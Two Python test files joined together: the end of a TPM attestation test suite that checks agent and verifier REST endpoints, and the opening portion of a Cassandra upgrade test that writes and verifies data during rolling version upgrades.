"""Test agent's GET /v2/keys/pubkey Interface"""
# We want a real cloud agent to communicate with!
launch_cloudagent()
time.sleep(10)
test_020_agent_keys_pubkey_get = RequestsClient(tenant_templ.agent_base_url, tls_enabled=False)
response = test_020_agent_keys_pubkey_get.get(
f'/v{self.api_version}/keys/pubkey',
cert="",
verify=False
)
self.assertEqual(response.status_code, 200, "Non-successful Agent pubkey return code!")
json_response = response.json()
# Ensure response is well-formed
self.assertIn("results", json_response, "Malformed response body!")
self.assertIn("pubkey", json_response["results"], "Malformed response body!")
global public_key
public_key = json_response["results"]["pubkey"]
self.assertNotEqual(public_key, None, "Malformed response body!")
def test_021_reg_agent_get(self):
# We need to refresh the aik value we've stored in case it changed
self.test_014_reg_agent_get()
def test_022_agent_quotes_identity_get(self):
"""Test agent's GET /v2/quotes/identity Interface"""
self.assertIsNotNone(aik_tpm, "Required value not set. Previous step may have failed?")
nonce = tpm_abstract.TPM_Utilities.random_password(20)
numretries = config.getint('tenant', 'max_retries')
while numretries >= 0:
test_022_agent_quotes_identity_get = RequestsClient(tenant_templ.agent_base_url, tls_enabled=False)
response = test_022_agent_quotes_identity_get.get(
f'/v{self.api_version}/quotes/identity?nonce={nonce}',
data=None,
cert="",
verify=False
)
if response.status_code == 200:
break
numretries -= 1
time.sleep(config.getint('tenant', 'retry_interval'))
self.assertEqual(response.status_code, 200, "Non-successful Agent identity return code!")
json_response = response.json()
# Ensure response is well-formed
self.assertIn("results", json_response, "Malformed response body!")
self.assertIn("quote", json_response["results"], "Malformed response body!")
self.assertIn("pubkey", json_response["results"], "Malformed response body!")
# Check the quote identity
self.assertTrue(tpm_instance.check_quote(tenant_templ.agent_uuid,
nonce,
json_response["results"]["pubkey"],
json_response["results"]["quote"],
aik_tpm,
hash_alg=json_response["results"]["hash_alg"]),
"Invalid quote!")
@unittest.skip("Testing of agent's POST /v2/keys/vkey disabled! (spawned CV should do this already)")
def test_023_agent_keys_vkey_post(self):
"""Test agent's POST /v2/keys/vkey Interface"""
# CV should do this (during CV POST/PUT test)
# Running this test might hide problems with the CV sending the V key
global public_key
self.assertIsNotNone(self.V, "Required value not set. Previous step may have failed?")
self.assertIsNotNone(public_key, "Required value not set. Previous step may have failed?")
encrypted_V = crypto.rsa_encrypt(crypto.rsa_import_pubkey(public_key), str(self.V))
b64_encrypted_V = base64.b64encode(encrypted_V)
data = {'encrypted_key': b64_encrypted_V}
test_023_agent_keys_vkey_post = RequestsClient(tenant_templ.agent_base_url, tls_enabled=False)
response = test_023_agent_keys_vkey_post.post(
f'/v{self.api_version}/keys/vkey',
data=json.dumps(data),
cert="",
verify=False
)
self.assertEqual(response.status_code, 200, "Non-successful Agent vkey post return code!")
json_response = response.json()
# Ensure response is well-formed
self.assertIn("results", json_response, "Malformed response body!")
def test_024_agent_keys_ukey_post(self):
"""Test agents's POST /v2/keys/ukey Interface"""
global public_key
self.assertIsNotNone(public_key, "Required value not set. Previous step may have failed?")
self.assertIsNotNone(self.U, "Required value not set. Previous step may have failed?")
self.assertIsNotNone(self.auth_tag, "Required value not set. Previous step may have failed?")
self.assertIsNotNone(self.payload, "Required value not set. Previous step may have failed?")
encrypted_U = crypto.rsa_encrypt(crypto.rsa_import_pubkey(public_key), self.U)
b64_encrypted_u = base64.b64encode(encrypted_U)
data = {
'encrypted_key': b64_encrypted_u,
'auth_tag': self.auth_tag,
'payload': self.payload
}
test_024_agent_keys_ukey_post = RequestsClient(tenant_templ.agent_base_url, tls_enabled=False)
response = test_024_agent_keys_ukey_post.post(
f'/v{self.api_version}/keys/ukey',
data=json.dumps(data),
cert="",
verify=False
)
self.assertEqual(response.status_code, 200, "Non-successful Agent ukey post return code!")
json_response = response.json()
# Ensure response is well-formed
self.assertIn("results", json_response, "Malformed response body!")
def test_025_cv_allowlist_post(self):
"""Test CV's POST /v2/allowlist/{name} Interface"""
data = {
'name': 'test-allowlist',
'tpm_policy': json.dumps(self.tpm_policy),
'vtpm_policy': json.dumps(self.vtpm_policy),
'ima_policy': json.dumps(self.allowlist),
}
cv_client = RequestsClient(tenant_templ.verifier_base_url, tls_enabled)
response = cv_client.post(
'/allowlists/test-allowlist',
data=json.dumps(data),
cert=tenant_templ.cert,
verify=False
)
self.assertEqual(response.status_code, 201, "Non-successful CV allowlist Post return code!")
json_response = response.json()
# Ensure response is well-formed
self.assertIn("results", json_response, "Malformed response body!")
def test_026_cv_allowlist_get(self):
"""Test CV's GET /v2/allowlists/{name} Interface"""
cv_client = RequestsClient(tenant_templ.verifier_base_url, tls_enabled)
response = cv_client.get(
'/allowlists/test-allowlist',
cert=tenant_templ.cert,
verify=False
)
self.assertEqual(response.status_code, 200, "Non-successful CV allowlist Post return code!")
json_response = response.json()
# Ensure response is well-formed
self.assertIn("results", json_response, "Malformed response body!")
results = json_response['results']
self.assertEqual(results['name'], 'test-allowlist')
self.assertEqual(results['tpm_policy'], json.dumps(self.tpm_policy))
self.assertEqual(results['vtpm_policy'], json.dumps(self.vtpm_policy))
self.assertEqual(results['ima_policy'], json.dumps(self.allowlist))
def test_027_cv_allowlist_delete(self):
"""Test CV's DELETE /v2/allowlists/{name} Interface"""
cv_client = RequestsClient(tenant_templ.verifier_base_url, tls_enabled)
response = cv_client.delete(
'/allowlists/test-allowlist',
cert=tenant_templ.cert,
verify=False
)
self.assertEqual(response.status_code, 204, "Non-successful CV allowlist Delete return code!")
# Cloud Verifier Testset
def test_030_cv_agent_post(self):
"""Test CV's POST /v2/agents/{UUID} Interface"""
self.assertIsNotNone(self.V, "Required value not set. Previous step may have failed?")
b64_v = base64.b64encode(self.V)
data = {
'v': b64_v,
'cloudagent_ip': tenant_templ.cloudagent_ip,
'cloudagent_port': tenant_templ.cloudagent_port,
'tpm_policy': json.dumps(self.tpm_policy),
'vtpm_policy': json.dumps(self.vtpm_policy),
'allowlist': json.dumps(self.allowlist),
'ima_sign_verification_keys': '',
'mb_refstate': None,
'metadata': json.dumps(self.metadata),
'revocation_key': self.revocation_key,
'accept_tpm_hash_algs': config.get('tenant', 'accept_tpm_hash_algs').split(','),
'accept_tpm_encryption_algs': config.get('tenant', 'accept_tpm_encryption_algs').split(','),
'accept_tpm_signing_algs': config.get('tenant', 'accept_tpm_signing_algs').split(','),
}
test_030_cv_agent_post = RequestsClient(tenant_templ.verifier_base_url, tls_enabled)
response = test_030_cv_agent_post.post(
f'/agents/{tenant_templ.agent_uuid}',
data=json.dumps(data),
cert=tenant_templ.cert,
verify=False
)
self.assertEqual(response.status_code, 200, "Non-successful CV agent Post return code!")
json_response = response.json()
# Ensure response is well-formed
self.assertIn("results", json_response, "Malformed response body!")
time.sleep(10)
@unittest.skip("Testing of CV's PUT /v2/agents/{UUID} disabled!")
def test_031_cv_agent_put(self):
"""Test CV's PUT /v2/agents/{UUID} Interface"""
# TODO: this should actually test PUT functionality (e.g., make agent fail and then PUT back up)
test_031_cv_agent_put = RequestsClient(tenant_templ.verifier_base_url, tls_enabled)
response = test_031_cv_agent_put.put(
f'/v{self.api_version}/agents/{tenant_templ.agent_uuid}',
data=b'',
cert=tenant_templ.cert,
verify=False
)
self.assertEqual(response.status_code, 200, "Non-successful CV agent Put return code!")
json_response = response.json()
# Ensure response is well-formed
self.assertIn("results", json_response, "Malformed response body!")
def test_032_cv_agents_get(self):
"""Test CV's GET /v2/agents Interface"""
test_032_cv_agents_get = RequestsClient(tenant_templ.verifier_base_url, tls_enabled)
response = test_032_cv_agents_get.get(
f'/v{self.api_version}/agents/',
cert=tenant_templ.cert,
verify=False
)
self.assertEqual(response.status_code, 200, "Non-successful CV agent List return code!")
json_response = response.json()
# Ensure response is well-formed
self.assertIn("results", json_response, "Malformed response body!")
self.assertIn("uuids", json_response["results"], "Malformed response body!")
# Be sure our agent is registered
self.assertEqual(1, len(json_response["results"]["uuids"]))
def test_033_cv_agent_get(self):
"""Test CV's GET /v2/agents/{UUID} Interface"""
test_033_cv_agent_get = RequestsClient(tenant_templ.verifier_base_url, tls_enabled)
response = test_033_cv_agent_get.get(
f'/v{self.api_version}/agents/{tenant_templ.agent_uuid}',
cert=tenant_templ.cert,
verify=False
)
self.assertEqual(response.status_code, 200, "Non-successful CV agent return code!")
json_response = response.json()
# Ensure response is well-formed
self.assertIn("results", json_response, "Malformed response body!")
# Check a few of the important properties are present
self.assertIn("operational_state", json_response["results"], "Malformed response body!")
self.assertIn("ip", json_response["results"], "Malformed response body!")
self.assertIn("port", json_response["results"], "Malformed response body!")
def test_034_cv_agent_post_invalid_exclude_list(self):
"""Test CV's POST /v2/agents/{UUID} Interface"""
self.assertIsNotNone(self.V, "Required value not set. Previous step may have failed?")
b64_v = base64.b64encode(self.V)
# Set unsupported regex in exclude list
allowlist = {'exclude': ['*']}
data = {
'v': b64_v,
'mb_refstate': None,
'cloudagent_ip': tenant_templ.cloudagent_ip,
'cloudagent_port': tenant_templ.cloudagent_port,
'tpm_policy': json.dumps(self.tpm_policy),
'vtpm_policy': json.dumps(self.vtpm_policy),
'allowlist': json.dumps(allowlist),
'ima_sign_verification_keys': '',
'metadata': json.dumps(self.metadata),
'revocation_key': self.revocation_key,
'accept_tpm_hash_algs': config.get('tenant', 'accept_tpm_hash_algs').split(','),
'accept_tpm_encryption_algs': config.get('tenant', 'accept_tpm_encryption_algs').split(','),
'accept_tpm_signing_algs': config.get('tenant', 'accept_tpm_signing_algs').split(','),
}
client = RequestsClient(tenant_templ.verifier_base_url, tls_enabled)
response = client.post(
f'/v{self.api_version}/agents/{tenant_templ.agent_uuid}',
cert=tenant_templ.cert,
data=json.dumps(data),
verify=False
)
self.assertEqual(response.status_code, 400, "CV agent Post with invalid exclude list did not return 400!")
# Ensure response is well-formed
json_response = response.json()
self.assertIn("results", json_response, "Malformed response body!")
# Agent Poll Testset
def test_040_agent_quotes_integrity_get(self):
"""Test agent's GET /v2/quotes/integrity Interface"""
global public_key
self.assertIsNotNone(aik_tpm, "Required value not set. Previous step may have failed?")
nonce = tpm_abstract.TPM_Utilities.random_password(20)
mask = self.tpm_policy["mask"]
vmask = self.vtpm_policy["mask"]
partial = "1"
if public_key is None:
partial = "0"
test_040_agent_quotes_integrity_get = RequestsClient(tenant_templ.agent_base_url, tls_enabled=False)
response = test_040_agent_quotes_integrity_get.get(
f'/v{self.api_version}/quotes/integrity?nonce={nonce}&mask={mask}&vmask={vmask}&partial={partial}',
cert="",
verify=False
)
self.assertEqual(response.status_code, 200, "Non-successful Agent Integrity Get return code!")
json_response = response.json()
# Ensure response is well-formed
self.assertIn("results", json_response, "Malformed response body!")
self.assertIn("quote", json_response["results"], "Malformed response body!")
if public_key is None:
self.assertIn("pubkey", json_response["results"], "Malformed response body!")
public_key = json_response["results"]["pubkey"]
self.assertIn("hash_alg", json_response["results"], "Malformed response body!")
quote = json_response["results"]["quote"]
hash_alg = json_response["results"]["hash_alg"]
validQuote = tpm_instance.check_quote(tenant_templ.agent_uuid,
nonce,
public_key,
quote,
aik_tpm,
self.tpm_policy,
hash_alg=hash_alg)
self.assertTrue(validQuote)
async def test_041_agent_keys_verify_get(self):
"""Test agent's GET /v2/keys/verify Interface
We use async here to allow function await while key processes"""
self.assertIsNotNone(self.K, "Required value not set. Previous step may have failed?")
challenge = tpm_abstract.TPM_Utilities.random_password(20)
encoded = base64.b64encode(self.K).decode('utf-8')
response = tornado_requests.request("GET",
"http://%s:%s/keys/verify?challenge=%s" % (self.cloudagent_ip, self.cloudagent_port, challenge))
response = await response
self.assertEqual(response.status, 200, "Non-successful Agent verify return code!")
json_response = json.loads(response.read().decode())
# Ensure response is well-formed
self.assertIn("results", json_response, "Malformed response body!")
self.assertIn("hmac", json_response["results"], "Malformed response body!")
# Be sure response is valid
mac = json_response['results']['hmac']
ex_mac = crypto.do_hmac(encoded, challenge)
# ex_mac = crypto.do_hmac(self.K, challenge)
self.assertEqual(mac, ex_mac, "Agent failed to validate challenge code!")
# CV Cleanup Testset
def test_050_cv_agent_delete(self):
"""Test CV's DELETE /v2/agents/{UUID} Interface"""
time.sleep(5)
test_050_cv_agent_delete = RequestsClient(tenant_templ.verifier_base_url, tls_enabled)
response = test_050_cv_agent_delete.delete(
f'/v{self.api_version}/agents/{tenant_templ.agent_uuid}',
cert=tenant_templ.cert,
verify=False
)
self.assertEqual(response.status_code, 202, "Non-successful CV agent Delete return code!")
json_response = response.json()
# Ensure response is well-formed
self.assertIn("results", json_response, "Malformed response body!")
def tearDown(self):
"""Nothing to bring down after each test"""
return
@classmethod
def tearDownClass(cls):
"""Nothing to bring down"""
return
if __name__ == '__main__':
unittest.main()
|
upgrade_through_versions_test.py | import operator
import os
import pprint
import random
import signal
import time
import uuid
from collections import defaultdict, namedtuple
from multiprocessing import Process, Queue
from Queue import Empty, Full
from unittest import skipUnless
import psutil
from cassandra import ConsistencyLevel, WriteTimeout
from cassandra.query import SimpleStatement
from nose.plugins.attrib import attr
from six import print_
from dtest import RUN_STATIC_UPGRADE_MATRIX, Tester, debug
from tools import generate_ssl_stores, known_failure, new_node
from upgrade_base import switch_jdks
from upgrade_manifest import (build_upgrade_pairs, current_2_0_x,
current_2_1_x, current_2_2_x, current_3_0_x,
indev_2_2_x, indev_3_x)
def data_writer(tester, to_verify_queue, verification_done_queue, rewrite_probability=0):
"""
Process for writing/rewriting data continuously.
Pushes to a queue to be consumed by data_checker.
Pulls from a queue of already-verified rows written by data_checker that it can overwrite.
Intended to be run using multiprocessing.
"""
# 'tester' is a cloned object so we shouldn't be inappropriately sharing anything with another process
session = tester.patient_cql_connection(tester.node1, keyspace="upgrade", protocol_version=tester.protocol_version)
prepared = session.prepare("UPDATE cf SET v=? WHERE k=?")
prepared.consistency_level = ConsistencyLevel.QUORUM
def handle_sigterm(signum, frame):
# need to close queue gracefully if possible, or the data_checker process
# can't seem to empty the queue and test failures result.
to_verify_queue.close()
exit(0)
signal.signal(signal.SIGTERM, handle_sigterm)
while True:
try:
key = None
if (rewrite_probability > 0) and (random.randint(0, 100) <= rewrite_probability):
try:
key = verification_done_queue.get_nowait()
except Empty:
# we wanted a re-write but the re-writable queue was empty. oh well.
pass
key = key or uuid.uuid4()
val = uuid.uuid4()
session.execute(prepared, (val, key))
to_verify_queue.put_nowait((key, val,))
except Exception:
debug("Error in data writer process!")
to_verify_queue.close()
raise
def data_checker(tester, to_verify_queue, verification_done_queue):
"""
Process for checking data continuously.
Pulls from a queue written to by data_writer to know what to verify.
Pushes to a queue to tell data_writer what's been verified and could be a candidate for re-writing.
Intended to be run using multiprocessing.
"""
# 'tester' is a cloned object so we shouldn't be inappropriately sharing anything with another process
session = tester.patient_cql_connection(tester.node1, keyspace="upgrade", protocol_version=tester.protocol_version)
prepared = session.prepare("SELECT v FROM cf WHERE k=?")
prepared.consistency_level = ConsistencyLevel.QUORUM
def handle_sigterm(signum, frame):
# need to close queue gracefully if possible, or the data_checker process
# can't seem to empty the queue and test failures result.
verification_done_queue.close()
exit(0)
signal.signal(signal.SIGTERM, handle_sigterm)
while True:
try:
# here we could block, but if the writer process terminates early with an empty queue
# we would end up blocking indefinitely
(key, expected_val) = to_verify_queue.get_nowait()
actual_val = session.execute(prepared, (key,))[0][0]
except Empty:
time.sleep(0.1) # let's not eat CPU if the queue is empty
continue
except Exception:
debug("Error in data verifier process!")
verification_done_queue.close()
raise
else:
try:
verification_done_queue.put_nowait(key)
except Full:
# the rewritable queue is full, not a big deal. drop this one.
# we keep the rewritable queue held to a modest max size
# and allow dropping some rewritables because we don't want to
# rewrite rows in the same sequence as originally written
pass
tester.assertEqual(expected_val, actual_val, "Data did not match expected value!")
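# Illustrative sketch (comment only) of how the writer/checker pair above is wired together;
# the real wiring lives in UpgradeTester._start_continuous_write_and_verify further down:
#   to_verify_queue = Queue()                      # rows written, awaiting verification
#   verification_done_queue = Queue(maxsize=500)   # verified rows, eligible for rewrite
#   writer = Process(target=data_writer, args=(tester, to_verify_queue, verification_done_queue, 25))
#   checker = Process(target=data_checker, args=(tester, to_verify_queue, verification_done_queue))
#   writer.daemon = checker.daemon = True
#   writer.start(); checker.start()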
def counter_incrementer(tester, to_verify_queue, verification_done_queue, rewrite_probability=0):
"""
Process for incrementing counters continuously.
Pushes to a queue to be consumed by counter_checker.
Pulls from a queue of already-verified rows written by counter_checker that it can increment again.
Intended to be run using multiprocessing.
"""
# 'tester' is a cloned object so we shouldn't be inappropriately sharing anything with another process
session = tester.patient_cql_connection(tester.node1, keyspace="upgrade", protocol_version=tester.protocol_version)
prepared = session.prepare("UPDATE countertable SET c = c + 1 WHERE k1=?")
prepared.consistency_level = ConsistencyLevel.QUORUM
def handle_sigterm(signum, frame):
# need to close queue gracefully if possible, or the data_checker process
# can't seem to empty the queue and test failures result.
to_verify_queue.close()
exit(0)
signal.signal(signal.SIGTERM, handle_sigterm)
while True:
try:
key = None
count = 0 # this will get set to actual last known count if we do a re-write
if (rewrite_probability > 0) and (random.randint(0, 100) <= rewrite_probability):
try:
key, count = verification_done_queue.get_nowait()
except Empty:
# we wanted a re-write but the re-writable queue was empty. oh well.
pass
key = key or uuid.uuid4()
session.execute(prepared, (key,))
to_verify_queue.put_nowait((key, count + 1,))
except Exception:
debug("Error in counter incrementer process!")
to_verify_queue.close()
raise
def counter_checker(tester, to_verify_queue, verification_done_queue):
"""
Process for checking counters continuously.
Pulls from a queue written to by counter_incrementer to know what to verify.
Pushes to a queue to tell counter_incrementer what's been verified and could be a candidate for incrementing again.
Intended to be run using multiprocessing.
"""
# 'tester' is a cloned object so we shouldn't be inappropriately sharing anything with another process
session = tester.patient_cql_connection(tester.node1, keyspace="upgrade", protocol_version=tester.protocol_version)
prepared = session.prepare("SELECT c FROM countertable WHERE k1=?")
prepared.consistency_level = ConsistencyLevel.QUORUM
def handle_sigterm(signum, frame):
# need to close queue gracefully if possible, or the data_checker process
# can't seem to empty the queue and test failures result.
verification_done_queue.close()
exit(0)
signal.signal(signal.SIGTERM, handle_sigterm)
while True:
try:
# here we could block, but if the writer process terminates early with an empty queue
# we would end up blocking indefinitely
(key, expected_count) = to_verify_queue.get_nowait()
actual_count = session.execute(prepared, (key,))[0][0]
except Empty:
time.sleep(0.1) # let's not eat CPU if the queue is empty
continue
except Exception:
debug("Error in counter verifier process!")
verification_done_queue.close()
raise
else:
tester.assertEqual(expected_count, actual_count, "Data did not match expected value!")
try:
verification_done_queue.put_nowait((key, actual_count))
except Full:
# the rewritable queue is full, not a big deal. drop this one.
# we keep the rewritable queue held to a modest max size
# and allow dropping some rewritables because we don't want to
# rewrite rows in the same sequence as originally written
pass
@attr("resource-intensive")
class UpgradeTester(Tester):
"""
Upgrades a 3-node Murmur3Partitioner cluster through versions specified in test_version_metas.
"""
test_version_metas = None # set on init to know which versions to use
subprocs = None # holds any subprocesses, for status checking and cleanup
extra_config = None # holds a non-mutable structure that can be cast as dict()
__test__ = False # this is a base class only
def __init__(self, *args, **kwargs):
# Ignore these log patterns:
self.ignore_log_patterns = [
# This one occurs if we do a non-rolling upgrade, the node
# it's trying to send the migration to hasn't started yet,
# and when it does, it gets replayed and everything is fine.
r'Can\'t send migration request: node.*is down',
r'RejectedExecutionException.*ThreadPoolExecutor has shut down',
# Occurs due to test/ccm writing topo on down nodes
r'Cannot update data center or rack from.*for live host',
# Normal occurrence. See CASSANDRA-12026. Likely won't be needed after C* 4.0.
r'Unknown column cdc during deserialization',
]
self.subprocs = []
Tester.__init__(self, *args, **kwargs)
def setUp(self):
debug("Upgrade test beginning, setting CASSANDRA_VERSION to {}, and jdk to {}. (Prior values will be restored after test)."
.format(self.test_version_metas[0].version, self.test_version_metas[0].java_version))
os.environ['CASSANDRA_VERSION'] = self.test_version_metas[0].version
switch_jdks(self.test_version_metas[0].java_version)
super(UpgradeTester, self).setUp()
debug("Versions to test (%s): %s" % (type(self), str([v.version for v in self.test_version_metas])))
def init_config(self):
Tester.init_config(self)
if self.extra_config is not None:
debug("Setting extra configuration options:\n{}".format(
pprint.pformat(dict(self.extra_config), indent=4))
)
self.cluster.set_configuration_options(
values=dict(self.extra_config)
)
def parallel_upgrade_test(self):
"""
Test upgrading cluster all at once (requires cluster downtime).
"""
self.upgrade_scenario()
@known_failure(failure_source='cassandra',
jira_url='https://issues.apache.org/jira/browse/CASSANDRA-11767',
flaky=True)
@known_failure(failure_source='test',
jira_url='https://issues.apache.org/jira/browse/CASSANDRA-12444',
flaky=True)
def rolling_upgrade_test(self):
"""
Test rolling upgrade of the cluster, so we have mixed versions part way through.
"""
self.upgrade_scenario(rolling=True)
def parallel_upgrade_with_internode_ssl_test(self):
"""
Test upgrading cluster all at once (requires cluster downtime), with internode ssl.
"""
self.upgrade_scenario(internode_ssl=True)
def rolling_upgrade_with_internode_ssl_test(self):
"""
Rolling upgrade test using internode ssl.
"""
self.upgrade_scenario(rolling=True, internode_ssl=True)
def upgrade_scenario(self, populate=True, create_schema=True, rolling=False, after_upgrade_call=(), internode_ssl=False):
# Record the rows we write as we go:
self.row_values = set()
cluster = self.cluster
if cluster.version() >= '3.0':
cluster.set_configuration_options({'enable_user_defined_functions': 'true',
'enable_scripted_user_defined_functions': 'true'})
elif cluster.version() >= '2.2':
cluster.set_configuration_options({'enable_user_defined_functions': 'true'})
if internode_ssl:
debug("***using internode ssl***")
generate_ssl_stores(self.test_path)
self.cluster.enable_internode_ssl(self.test_path)
if populate:
# Start with 3 node cluster
debug('Creating cluster (%s)' % self.test_version_metas[0].version)
cluster.populate(3)
[node.start(use_jna=True, wait_for_binary_proto=True) for node in cluster.nodelist()]
else:
debug("Skipping cluster creation (should already be built)")
# add nodes to self for convenience
for i, node in enumerate(cluster.nodelist(), 1):
node_name = 'node' + str(i)
setattr(self, node_name, node)
if create_schema:
if rolling:
self._create_schema_for_rolling()
else:
self._create_schema()
else:
debug("Skipping schema creation (should already be built)")
time.sleep(5) # sigh...
self._log_current_ver(self.test_version_metas[0])
if rolling:
# start up processes to write and verify data
write_proc, verify_proc, verification_queue = self._start_continuous_write_and_verify(wait_for_rowcount=5000)
increment_proc, incr_verify_proc, incr_verify_queue = self._start_continuous_counter_increment_and_verify(wait_for_rowcount=5000)
# upgrade through versions
for version_meta in self.test_version_metas[1:]:
for num, node in enumerate(self.cluster.nodelist()):
# sleep (sigh) because driver needs extra time to keep up with topo and make quorum possible
# this is ok, because a real world upgrade would proceed much slower than this programmatic one
# additionally this should provide more time for timeouts and other issues to crop up as well, which we could
# possibly "speed past" in an overly fast upgrade test
time.sleep(60)
self.upgrade_to_version(version_meta, partial=True, nodes=(node,))
self._check_on_subprocs(self.subprocs)
debug('Successfully upgraded %d of %d nodes to %s' %
(num + 1, len(self.cluster.nodelist()), version_meta.version))
self.cluster.set_install_dir(version=version_meta.version)
# Stop write processes
write_proc.terminate()
increment_proc.terminate()
# wait for the verification queue's to empty (and check all rows) before continuing
self._wait_until_queue_condition('writes pending verification', verification_queue, operator.le, 0, max_wait_s=1200)
self._wait_until_queue_condition('counters pending verification', incr_verify_queue, operator.le, 0, max_wait_s=1200)
self._check_on_subprocs([verify_proc, incr_verify_proc]) # make sure the verification processes are running still
self._terminate_subprocs()
# not a rolling upgrade, do everything in parallel:
else:
# upgrade through versions
for version_meta in self.test_version_metas[1:]:
self._write_values()
self._increment_counters()
self.upgrade_to_version(version_meta)
self.cluster.set_install_dir(version=version_meta.version)
self._check_values()
self._check_counters()
self._check_select_count()
# run custom post-upgrade callables
for call in after_upgrade_call:
call()
debug('All nodes successfully upgraded to %s' % version_meta.version)
self._log_current_ver(version_meta)
cluster.stop()
def tearDown(self):
# just to be super sure we get cleaned up
self._terminate_subprocs()
super(UpgradeTester, self).tearDown()
def _check_on_subprocs(self, subprocs):
"""
Check on given subprocesses.
If any are not alive, we'll go ahead and terminate any remaining alive subprocesses since this test is going to fail.
"""
subproc_statuses = [s.is_alive() for s in subprocs]
if not all(subproc_statuses):
message = "A subprocess has terminated early. Subprocess statuses: "
for s in subprocs:
message += "{name} (is_alive: {aliveness}), ".format(name=s.name, aliveness=s.is_alive())
message += "attempting to terminate remaining subprocesses now."
self._terminate_subprocs()
raise RuntimeError(message)
def _terminate_subprocs(self):
for s in self.subprocs:
if s.is_alive():
try:
psutil.Process(s.pid).kill() # with fire damnit
except Exception:
debug("Error terminating subprocess. There could be a lingering process.")
pass
def upgrade_to_version(self, version_meta, partial=False, nodes=None):
"""
Upgrade Nodes - if *partial* is True, only upgrade those nodes
that are specified by *nodes*, otherwise ignore *nodes* specified
and upgrade all nodes.
"""
debug('Upgrading {nodes} to {version}'.format(nodes=[n.name for n in nodes] if nodes is not None else 'all nodes', version=version_meta.version))
switch_jdks(version_meta.java_version)
debug("JAVA_HOME: " + os.environ.get('JAVA_HOME'))
if not partial:
nodes = self.cluster.nodelist()
for node in nodes:
debug('Shutting down node: ' + node.name)
node.drain()
node.watch_log_for("DRAINED")
node.stop(wait_other_notice=False)
for node in nodes:
node.set_install_dir(version=version_meta.version)
debug("Set new cassandra dir for %s: %s" % (node.name, node.get_install_dir()))
# hacky? yes. We could probably extend ccm to allow this publicly.
# the topology file needs to be written before any nodes are started
# otherwise they won't be grouped into dc's properly for multi-dc tests
self.cluster._Cluster__update_topology_files()
# Restart nodes on new version
for node in nodes:
debug('Starting %s on new version (%s)' % (node.name, version_meta.version))
# Setup log4j / logback again (necessary moving from 2.0 -> 2.1):
node.set_log_level("INFO")
node.start(wait_other_notice=240, wait_for_binary_proto=True)
node.nodetool('upgradesstables -a')
def _log_current_ver(self, current_version_meta):
"""
Logs where we currently are in the upgrade path, surrounding the current branch/tag, like ***sometag***
"""
vers = [m.version for m in self.test_version_metas]
curr_index = vers.index(current_version_meta.version)
debug(
"Current upgrade path: {}".format(
vers[:curr_index] + ['***' + current_version_meta.version + '***'] + vers[curr_index + 1:]))
def _create_schema_for_rolling(self):
"""
Slightly different schema variant for testing rolling upgrades with quorum reads/writes.
"""
session = self.patient_cql_connection(self.node2, protocol_version=self.protocol_version)
session.execute("CREATE KEYSPACE upgrade WITH replication = {'class':'SimpleStrategy', 'replication_factor':3};")
session.execute('use upgrade')
session.execute('CREATE TABLE cf ( k uuid PRIMARY KEY, v uuid )')
session.execute('CREATE INDEX vals ON cf (v)')
session.execute("""
CREATE TABLE countertable (
k1 uuid,
c counter,
PRIMARY KEY (k1)
);""")
def _create_schema(self):
session = self.patient_cql_connection(self.node2, protocol_version=self.protocol_version)
session.execute("CREATE KEYSPACE upgrade WITH replication = {'class':'SimpleStrategy', 'replication_factor':2};")
session.execute('use upgrade')
session.execute('CREATE TABLE cf ( k int PRIMARY KEY, v text )')
session.execute('CREATE INDEX vals ON cf (v)')
session.execute("""
CREATE TABLE countertable (
k1 text,
k2 int,
c counter,
PRIMARY KEY (k1, k2)
);""")
def _write_values(self, num=100):
session = self.patient_cql_connection(self.node2, protocol_version=self.protocol_version)
session.execute("use upgrade")
for i in xrange(num):
x = len(self.row_values) + 1
session.execute("UPDATE cf SET v='%d' WHERE k=%d" % (x, x))
self.row_values.add(x)
def _check_values(self, consistency_level=ConsistencyLevel.ALL):
for node in self.cluster.nodelist():
session = self.patient_cql_connection(node, protocol_version=self.protocol_version)
session.execute("use upgrade")
for x in self.row_values:
query = SimpleStatement("SELECT k,v FROM cf WHERE k=%d" % x, consistency_level=consistency_level)
result = session.execute(query)
k, v = result[0]
self.assertEqual(x, k)
self.assertEqual(str(x), v)
def _wait_until_queue_condition(self, label, queue, opfunc, required_len, max_wait_s=600):
"""
Waits up to max_wait_s for queue size to return True when evaluated against a condition function from the operator module.
Label is just a string identifier for easier debugging.
On Mac OS X the queue size may not be checkable, in which case this will not block.
If time runs out, raises RuntimeError.
"""
wait_end_time = time.time() + max_wait_s
while time.time() < wait_end_time:
try:
qsize = queue.qsize()
except NotImplementedError:
debug("Queue size may not be checkable on Mac OS X. Test will continue without waiting.")
break
if opfunc(qsize, required_len):
debug("{} queue size ({}) is '{}' to {}. Continuing.".format(label, qsize, opfunc.__name__, required_len))
break
if divmod(round(time.time()), 30)[1] == 0:
debug("{} queue size is at {}, target is to reach '{}' {}".format(label, qsize, opfunc.__name__, required_len))
time.sleep(0.1)
continue
else:
raise RuntimeError("Ran out of time waiting for queue size ({}) to be '{}' to {}. Aborting.".format(qsize, opfunc.__name__, required_len))
def _start_continuous_write_and_verify(self, wait_for_rowcount=0, max_wait_s=600):
"""
Starts a writer process, a verifier process, a queue to track writes,
and a queue to track successful verifications (which are rewrite candidates).
wait_for_rowcount provides a number of rows to write before unblocking and continuing.
Returns the writer process, verifier process, and the to_verify_queue.
"""
# queue of writes to be verified
to_verify_queue = Queue()
# queue of verified writes, which are update candidates
verification_done_queue = Queue(maxsize=500)
writer = Process(target=data_writer, args=(self, to_verify_queue, verification_done_queue, 25))
# daemon subprocesses are killed automagically when the parent process exits
writer.daemon = True
self.subprocs.append(writer)
writer.start()
if wait_for_rowcount > 0:
self._wait_until_queue_condition('rows written (but not verified)', to_verify_queue, operator.ge, wait_for_rowcount, max_wait_s=max_wait_s)
verifier = Process(target=data_checker, args=(self, to_verify_queue, verification_done_queue))
# daemon subprocesses are killed automagically when the parent process exits
verifier.daemon = True
self.subprocs.append(verifier)
verifier.start()
return writer, verifier, to_verify_queue
def _start_continuous_counter_increment_and_verify(self, wait_for_rowcount=0, max_wait_s=600):
"""
Starts a counter incrementer process, a verifier process, a queue to track writes,
and a queue to track successful verifications (which are re-increment candidates).
Returns the writer process, verifier process, and the to_verify_queue.
"""
# queue of writes to be verified
to_verify_queue = Queue()
# queue of verified writes, which are update candidates
verification_done_queue = Queue(maxsize=500)
incrementer = Process(target=counter_incrementer, args=(self, to_verify_queue, verification_done_queue, 25))
# daemon subprocesses are killed automagically when the parent process exits
incrementer.daemon = True
self.subprocs.append(incrementer)
incrementer.start()
if wait_for_rowcount > 0:
